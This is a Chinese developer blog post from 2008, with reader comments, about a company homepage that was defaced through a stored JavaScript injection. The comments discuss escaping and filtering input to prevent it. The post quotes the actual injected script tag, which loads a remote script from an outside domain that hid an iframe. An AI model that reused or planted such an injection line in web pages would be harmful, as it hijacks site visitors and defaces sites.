2008-07-14

难道你们没有被js注入过?

关键字: 都别装了

    酷热下午,正昏昏欲睡ing,同事A突然惊呼,网站首页怎么变乱码了?打开一看,果然,心中一阵暗怒,是不是新来的菜鸟乱提交啊。不过还好首页不是我的活,看了下svn服务器,上午并没有提交新内容,额,算了,先回复到昨天下班的版本吧。


    ok,一切正常,继续去苏州吧,突然电话响起,同事B接的。接完后他一脸肃穆的对大家说,刚才有人反映说我们的首页乱码,他能够帮我们解决。技术部各位哈哈大笑一阵,笑完又觉得太诡异了,不是吧 那么快他就发现我们首页问题。


    过了十分钟,我刚到昆山的时候,同事A又惊呼(我为什么要说又...),首页又乱码了....这次大家都笑不出来了,隔了几分钟,电话又来了,还是个MM。同样的话复述了一遍。老大也被惊动了,稍微分析了一下问题:托管机房被黑了? 概率不大 静态页面被更改? 有可能 我们自身程序问题? 也不能排除


    同事D建议看下事发后的数据库的情况。大家分头行动,先看自身程序问题,无奈开始跑单元/集成测试。
"尤里卡,"同事E好像发现了新大陆(当然原话肯定没那么禅),果然是在数据库里发现了一个温州的ip,插入了一个js脚本

<script src=http://www.xryq.cn/mm/index.js></script>

 靠,这个里面还有个iframe,丫隐藏的真深,搞了半天还是给他们网站刷流量。现在的人怎么都这么...

 

诶,幸好我在自己的程序里所有的提交的字段都有h(),看来安全问题在写程序的时候也要多加留神。

好了,套一句JE很俗的话,各位都别装了,难道你们没有被js/sql注入过?

 

评论
suke 2008-08-06   回复
You can escape it. Actually Apache Commons Lang has a StringEscapeUtils class can help you to do it. Security vulnerability such as javascript injection, SQL injection, cross-site Scripting attacks, carriage return Line feed etc. has to be tested when your application goes to life. Another solution to prevent is use the open source project ModSecurity from http://www.modsecurity.org/, which add another additional layer to your application via apache web server.
wisdom3099 2008-08-05   回复
d2up 写道
gigix 写道
lordhong 写道
NightTree 写道
怎样防这种js注入呢?

replace, replaceAll

h


h 是什么方法呀,怎么用的。来个明白人给说说吧。

是ROR中的一个方法,会将所有的"<>"变成& lt;,& gt,这样某些人就不能捣乱了。
jofy1004 2008-08-05   回复
./..........................................
bluemeteor 2008-07-15   回复
robertlyc 写道


引用
用户善意提醒,那帮人还好意思哈哈大笑呢。。。
用户提醒...,你好天真


难道是天真的SQA mm的电话?
d2up 2008-07-15   回复
gigix 写道
lordhong 写道
NightTree 写道
怎样防这种js注入呢?

replace, replaceAll

h


h 是什么方法呀,怎么用的。来个明白人给说说吧。
nighthawk 2008-07-15   回复
确实遇到过,倒不是乱码,现象是局部页面刷不出来。
是公司的网络管理部门解决的。 
robertlyc 2008-07-15   回复
gigix 写道
lordhong 写道
NightTree 写道
怎样防这种js注入呢?

replace, replaceAll

h


引用
诶,幸好我在自己的程序里所有的提交的字段都有h()
恩,我检查过了,除了tinymce编辑器那里,都加h()了

引用
用户善意提醒,那帮人还好意思哈哈大笑呢。。。
用户提醒...,你好天真
gigix 2008-07-15   回复
lordhong 写道
NightTree 写道
怎样防这种js注入呢?

replace, replaceAll

h
bluemeteor 2008-07-15   回复
很纳闷,这种注入你们技术部都没控制,用户善意提醒,那帮人还好意思哈哈大笑呢。。。
lordhong 2008-07-15   回复
NightTree 写道
怎样防这种js注入呢?

replace, replaceAll
NightTree 2008-07-14   回复
怎样防这种js注入呢?
小虫1313 2008-07-14   回复
额..
这算最平常的吧  你是没见过nnd注在网页中间 并且都是反着的  只能一行行的找
quaff 2008-07-14   回复
除了富文本编辑器提交过来的,所有的用户输入都应该转义,富文本编辑器的内容应该对script标签,css的expression,html里面的onXXX事件等很多东西过滤

http://www.bitscn.com/hack/young/200708/108278.html
ham 2008-07-14   回复
事实上...没有.
发表评论

提醒: 该博客已发表在公共论坛,博客所有留言会成为论坛回贴,留言请注意遵守论坛发贴规则

您还没有登录,请登录后发表评论

robertlyc
搜索本博客
我的相册
4cb13b7d-c5b6-3264-8932-c290d0a62790-thumb
333.JPG
共 6 张
最近加入圈子
存档
最新评论